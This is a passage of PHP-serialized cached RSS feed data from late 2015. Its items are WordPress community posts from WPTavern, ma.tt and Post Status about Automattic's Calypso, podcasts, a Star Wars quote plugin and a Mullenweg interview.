                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 02 Dec 2015 14:05:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"Matt: Joule Sous Vide Machine\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=45647\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"http://ma.tt/2015/12/joule-sous-vide-machine/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:561:\"

                                                                 

                                                                \n

                                                                \"kitchen-essential

                                                                \n

                                                                On Eater check out the story of how a video game mogul, an airplane engineer, a scientist, a designer, and a bunch of chefs developed a new immersion circulator they named Joule. I’m a big fan of the Chefsteps team.

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 01 Dec 2015 18:10:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Matt Mullenweg Joins the Gillmor Gang to Discuss Calypso\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49150\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"http://wptavern.com/matt-mullenweg-joins-the-gillmor-gang-to-discuss-calypso\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2326:\"

                                                                \"gillmor-gang\"

                                                                \n

                                                                Last week Matt Mullenweg, CEO of Automattic and co-creator of WordPress, joined Robert Scoble, John Borthwick, and Steve Gillmor to discuss Calypso on an episode of the Gillmor Gang. The video was recorded Tuesday, November 24 and published over the weekend.

                                                                \n

                                                                Mullenweg offers a hands-on tour of the new reader, notifications, and editor and explains WordPress.com’s new architecture for audience members who are not development-oriented. He also explains how the desktop client and browser version were developed simultaneously so that WordPress.com can continue to iterate just as quickly as it has in the past, with developers committing new code 140+ times per day.

                                                                \n

                                                                If you can’t get enough of WordPress vs. Medium comparisons, then this episode is for you. When asked if he sees Medium as a competitor to WordPress, Mullenweg replied, “In some ways we compete with every place that people publish online, even Twitter or Facebook, but in day to day, that competition doesn’t really drive product decisions and for most people what we provide is pretty distinct from what these other platforms have.”

                                                                \n

                                                                Later in the episode Mullenweg is asked, “What are the holes still left unfilled in publishing?”

                                                                \n

                                                                “Publishing is still so mediocre,” he replied. “Some of the best stuff Medium did is around their editor. I think the whole writing/collaboration experience can be significantly better than it is today.”

                                                                \n

                                                                Mullenweg elaborates on the differences between WordPress.com and Medium’s user base and his vision for where Automattic will take Calypso in the future. Unfortunately, we can’t embed the episode here, but you can check it out on TechCrunch.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 30 Nov 2015 22:28:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"WPTavern: State of the Word Idea: Remembering Those We’ve Lost in the WordPress Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49212\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"http://wptavern.com/state-of-the-word-idea-remembering-those-weve-lost-in-the-wordpress-community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3074:\"

                                                                \"Ideaphoto credit: [17:38] idee?(license)Later this week, nearly 2,000 people will be in Philadelphia, PA to attend WordCamp US, the annual conference devoted to WordPress. One of the event’s highlights is Matt Mullenweg’s State of the Word presentation. In it, Mullenweg shares data on WordPress’ growth throughout the year and gives insight to where the project is heading.

                                                                \n

                                                                About a week before his presentation, Mullenweg asks members of the WordPress community for feedback. Questions include:

                                                                \n
                                                                  \n
                                                                1. What are the things you’re most proud of WordPress or people in the community doing over the past year?
                                                                2. \n
                                                                3. Have there been people who you feel have influenced the project in a big way, including yourself, and how?
                                                                4. \n
                                                                5. What do you think we should focus on and work on the most in the next year?
                                                                6. \n
                                                                7. Any stories you’ve heard with or around WordPress that you think deserve being highlighted?
                                                                8. \n
                                                                9. Anything else?
                                                                10. \n
                                                                \n

                                                                This year, the most important question he asks is number five. Each year during the State of the Word, Mullenweg highlights new and existing contributors and we as a community cheer and celebrate them. This year, we’ve lost some incredibly talented and important people in the community.

                                                                \n

                                                                I suggest that Mullenweg adds one slide to his presentation that remembers the lives of those lost in the community this year. The slide should have Gravatars or photos and the names of those who passed away. Here are a few people who would be on the slide.

                                                                \n\n

                                                                If you’re in favor of this idea and know someone in the WordPress community who passed away this year, please leave a comment with their name and if possible, a link to their obituary.

                                                                \n

                                                                WordPress is a 12-year-old open source software project that will likely survive long after the people who help maintain it pass on. Adding a slide to the State of the Word that remembers contributors who passed away during the year is a small price to pay. It also humanizes the software and serves as a reminder that without contributors, WordPress wouldn’t exist.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 30 Nov 2015 20:22:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"WPTavern: Early Reviews Show Applications Like Calypso Are the Future of WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49161\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"http://wptavern.com/early-reviews-show-applications-like-calypso-are-the-future-of-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6086:\"

                                                                \"calypso\"

                                                                \n

                                                                Last week Automattic unveiled Project Calypso, a brand new architecture for WordPress.com and a Mac app that mirrors the experience on desktop. The overhaul was nearly two years in the making, a risky bet for Automattic but one that shows a glimpse of what the future of WordPress could be.

                                                                \n

                                                                The new JavaScript and REST API-powered WordPress.com technologically pivots the platform into a lithe modern publishing engine while shedding 10 years of legacy code in the process. It’s easy to see why Calypso has so far received glowing reviews from news outlets around the web. The giant technological leap forward results in a publishing experience that is a night-and-day difference when it comes to page loads, content previewing, and real-time updating.

                                                                \n

                                                                In an interview with VentureBeat, Matt Mullenweg answers a burning question that the community wants to know – What does Calypso mean for WordPress core? Will core adopt a similar technology stack? Mullenweg sees Calypso as just one example of what is possible with WordPress.

                                                                \n

                                                                So I think what might happen is that the technology that drives the server side of WordPress and what drives the client side can diverge. Again, this is really up to the community, so we’ll see where it takes us. This thing we released has only been out there one day. Maybe someone will make something much better?

                                                                \n

                                                                WordPress.com’s new architecture isn’t the first case of “headless WordPress,” though it is one of the most prominent and easiest examples for users to demo. Many other WordPress-powered sites have already adopted an approach that decouples the interface using the new WP REST API. Apps like StoryCorps, Nomadbase, the New York Times, and the Wired.com liveblog are a few early pioneers using the API to deliver content.

                                                                \n

                                                                Another example offered in the comments on the WordPress.com developer blog cites ustwo.com (the makers of Monument Valley, Dice, and other popular apps) as using a similar setup. The site is a React.js single-page application that serves WordPress content via the WP REST API using custom endpoints. Like WordPress.com, the code for this site is also open source on GitHub.

                                                                \n

                                                                Despite the risk of sharing the large innovative codebase with competitors, Automattic opted to keep Calypso open and available for anyone in the WordPress community to learn from and build upon.

                                                                \n

                                                                “A lot of people thought we should keep this proprietary, but throughout my life I’ve learned that the more you give away, the more you get back,” Mullenweg said in his announcement.

                                                                \n

                                                                Within the first 24 hours the repo was already trending on GitHub, with developers eagerly reviewing the code. ManageWP, a competitor to Jetpack Manage, praised Calypso as an important tool to help drive up WordPress marketshare and move the platform forward:

                                                                \n

                                                                That’s the beauty of WordPress – the Foundation is not looking to put us under Automattic’s thumb; Matt and his team are actively encouraging the WordPress community, through open source policy, to keep building, innovating, making lives easier for everyone, and find their own place in the ecosystem.

                                                                \n

                                                                Automattic’s commitment to open sourcing its code demonstrates that any innovations they release are not designed to eclipse competitors’ efforts but rather to add to the shared knowledge bank that drives WordPress improvements.

                                                                \n

                                                                Mullenweg, in a roundup of press on Calypso, brings it back to the core value of democratizing publishing.

                                                                \n

                                                                “At the end of the day, it’s not about technology for technology’s sake, it’s about technology at the service of human voices,” he said. “Embracing change to support the free, open web where everyone has a voice.”

                                                                \n

                                                                Calypso is one of the best new examples of having WordPress your way. It demonstrates the flexibility of using a REST API to run any kind of JavaScript application on top of WordPress while maintaining the use of its world class CMS features. Greater architectural freedom for developers means more compelling publishing experiences for users. The success of the open source Calypso project will likely pave the way for many more JavaScript and REST API-powered WordPress sites and desktop applications.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 30 Nov 2015 19:29:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"WPTavern: New WordPress Plugin Replaces Hello Dolly Lyrics With Random Quotes From Star Wars Characters\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49194\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:113:\"http://wptavern.com/new-wordpress-plugin-replaces-hello-dolly-lyrics-with-random-quotes-from-star-wars-characters\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1848:\"

                                                                On December 18th, fans across the U.S. will flock to movie theaters to watch Star Wars: The Force Awakens. If you’d like to get your site in the spirit of the movie, check out The Force, a new plugin created by Rohit Motwani who lives in India.

                                                                \n

                                                                The Force replaces lyrics from the Hello Dolly plugin with random quotes from Star Wars characters. Quotes include:

                                                                \n
                                                                  \n
                                                                • I find your lack of faith disturbing.
                                                                • \n
                                                                • Don’t Underestimate the power of The Dark Side.
                                                                • \n
                                                                • Hmm! Adventure. Hmmpf! Excitement. A Jedi craves not these things.
                                                                • \n
                                                                • Hey R2 , What do you think?
                                                                • \n
                                                                • Peeeeee poooo peeee peeee peee pooooo tuiiiiiiiiii.
                                                                • \n
                                                                • Good Relations with Wookies I have.
                                                                • \n
                                                                \n

                                                                My favorite quote is from Chewbacca, “AAAAAAAhhhhhhhhhhhhh AAAAAAAAhhhhhhhhhhhhhhhhh.”

                                                                \n\"QuoteQuote from Chewbacca\n

                                                                I discovered typos in some of the quotes but Motwani is already in the process of fixing them. The Force works as expected in WordPress 4.4 and is available for free from the WordPress plugin directory. Last but not least, I hear that Wookies are great Christmas gifts.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 30 Nov 2015 18:45:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Matt: Two Podcasts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=45673\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"http://ma.tt/2015/11/two-podcasts/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:616:\"

                                                                Last week I did two podcasts around the Calypso news that are both now up, and show very different sides of the announcement. The first was with Brian Krogsgard of the WordPress-focused site Post Status and we talked a lot about the Calypso launch in the context of the WordPress community. The second was the always-fun video group the Gillmor Gang which ranged quite a bit but mostly focused on Calypso in the context of the wider tech world and where we’re going.

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 30 Nov 2015 18:15:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"WPTavern: WPWeekly Episode 214 – Chris Lema on WordPress in the Enterprise, Market Share, and Calypso\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49160\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"http://wptavern.com/wpweekly-episode-214-chris-lema-on-wordpress-in-the-enterprise-market-share-and-calypso\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4449:\"

                                                                In this episode of WordPress Weekly, Marcus Couch and I are joined by Chris Lema to discuss WordPress in the enterprise, the on boarding experience, and Calypso. Lema shares his experience beta testing a Windows version of Automattic’s new desktop application. We discuss how WordPress is going to grow its market share from 25% to 50% and how important Jetpack is to reaching that goal. Near the end of the interview, Lema shares what he’s most thankful for as it relates to WordPress.

                                                                \n

                                                                Stories Discussed:

                                                                \n

                                                                Automattic Unveils Open Source WordPress.com Desktop Application for the Mac

                                                                \n

                                                                Plugins Picked By Marcus:

                                                                \n

                                                                WP TAO by Michal Jaworski and Damian Gora from Poland, is a free powerful WordPress plugin for tracking website visitors. It allows you to identify your users and keep track of their activities in an easy to read digital dashboard and log format.

                                                                \n

                                                                Cool Timeline is Narinder Singh’s first plugin in the repository. It creates responsive, vertical story lines in chronological order based on the year and date of your posts.

                                                                \n

                                                                The Force created by Rohit Motwani from India, is a Hello Dolly clone that when activated, replaces music lyrics with random quotes from Star Wars characters.

                                                                \n

                                                                What I’m Thankful For:

                                                                \n

                                                                This has been a rough year for me. I’m struggling with my health and maintaining a schedule as a distributed worker. A dear WordPress friend of mine (Kim Parsell) passed away at the beginning of the year. My grandma was recently diagnosed with lung cancer and I’ve been dealing with wild swings between feeling positive and downright depressed.

                                                                \n

                                                                The thing I’m most thankful for this year as it relates to WordPress are the people who make up the community. Some are personal friends, others live on the other side of the world. Their consistent reinforcement of positive vibes has helped me get through some turbulent times in my life this year. To everyone who has and continues to give me encouragement, advice, and positive reinforcement, thank you.

                                                                \n

                                                                What Marcus is Thankful For:

                                                                \n

                                                                This year was one of the hardest years for me in terms of professional struggles and hardships. I lost relatives and friends, a job, and had to start from square one. I had a lot of support from within the WordPress community coming really close to working with a few people directly. In the end, it was my WordPress skills that landed me a new gig, which I now call The Dream Gig.

                                                                \n

                                                                I’m thankful for the opportunities to meet people from within the WordPress community in real life. From Chris Lema and Cory Miller to Jeff Chandler and beyond. Every time I meet someone, they not only share their successes, but their struggles. It’s good to know that I’m not the only one and be able to use their strength and perseverance to fuel my drive and passion for WordPress.

                                                                \n

                                                                I’m thankful for the opportunity to share what I know to thousands of people around the world. I feel the best sense of accomplishment when I receive an email from someone that’s stuck on a particular problem and discovers a solution after they hear me talk about a plugin or technique on a podcast. It’s a great outlet for me personally that I hope to continue for many more years to come. Thanks to all who are listening and to those who are listening for the first time.

                                                                \n

                                                                WPWeekly Meta:

                                                                \n

                                                                Next Episode: Wednesday, December 2nd 9:30 P.M. Eastern

                                                                \n

                                                                Subscribe To WPWeekly Via Itunes: Click here to subscribe

                                                                \n

                                                                Subscribe To WPWeekly Via RSS: Click here to subscribe

                                                                \n

                                                                Subscribe To WPWeekly Via Stitcher Radio: Click here to subscribe

                                                                \n

                                                                Listen To Episode #214:
                                                                \n

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 30 Nov 2015 16:05:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Matt: Dan Gilbert on Happiness\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=45670\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"http://ma.tt/2015/11/dan-gilbert-on-happiness/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:200:\"

                                                                \n

                                                                This is an oldie but a goodie, Dan Gilbert’s TED talk on the Surprising Science of Happiness.

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 30 Nov 2015 06:10:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"Post Status: Interview with Automattic CEO, Matt Mullenweg, on Calypso and more\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=15012\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://poststatus.com/interviews-matt-mullenweg/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:18565:\"

                                                                I had the opportunity to interview Matt Mullenweg about an ambitious project that included more than a year and a half of development to create an all new WordPress.com interface, both for the web and a desktop app. The project was codenamed Calypso, and we talked about many aspects of Calypso, as well as a variety of subjects that relate to it.

                                                                \nhttps://audio.simplecast.fm/21252.mp3\n

                                                                Direct Download

                                                                \n

                                                                You can subscribe (and you should!) to the Post Status Draft Podcast on iTunes, Stitcher or via RSS. If you like the show, I’d highly appreciate if you share it with your friends and colleagues.

                                                                \n

                                                                Why did you make such a big bet on Calypso?

                                                                \n

                                                                Matt has talked for a while now about his vision that WordPress can become an “app platform,” and this is an example of what that meant to him.

                                                                \n

                                                                He also notes how he’s always  looking for things that will “move the needle” for greater WordPress adoption. We were both thinking about the same statistic: that roughly 96% of WordPress.com users (and probably a high number of WordPress.org users too) essentially abandon their websites after a short tenure. So anything that can increase that number, to say 8% or 15% of folks that stick with it long term, can make a huge difference.

                                                                \n

                                                                How do you think about investing in feature development for WordPress.com, and how it affects WordPress as well?

                                                                \n

                                                                When Matt considers where he wants to invest Automattic developer and designer time, he says he thinks of WordPress as a whole first, before considering specifics for WordPress.com. He’d rather see WordPress.com as a gateway to a self-hosted install. And whether someone stays on .com or moves to a self-hosted install, he wants to help ensure that their problems are solved.

                                                                \n

                                                                WordPresses

                                                                \n

